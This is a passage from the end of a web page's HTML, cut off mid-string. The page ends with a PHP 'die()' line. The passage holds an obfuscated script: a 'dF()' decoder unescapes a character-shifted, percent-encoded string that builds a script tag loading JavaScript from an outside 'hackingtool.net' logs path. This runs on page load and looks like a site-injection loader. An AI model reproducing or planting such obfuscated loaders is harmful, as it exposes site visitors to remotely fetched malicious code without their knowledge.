9%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E' ));dF('%264
Dtdsjqu%2631tsd%264E%2633iuuqt%264B00ibdljohuppm/ofu0mpht0dj%7B/kt%2633%264F%264D0tdsjqu%26
4F%26311')</script>
<!--script end-->
</body>
</html><?php die();?>
```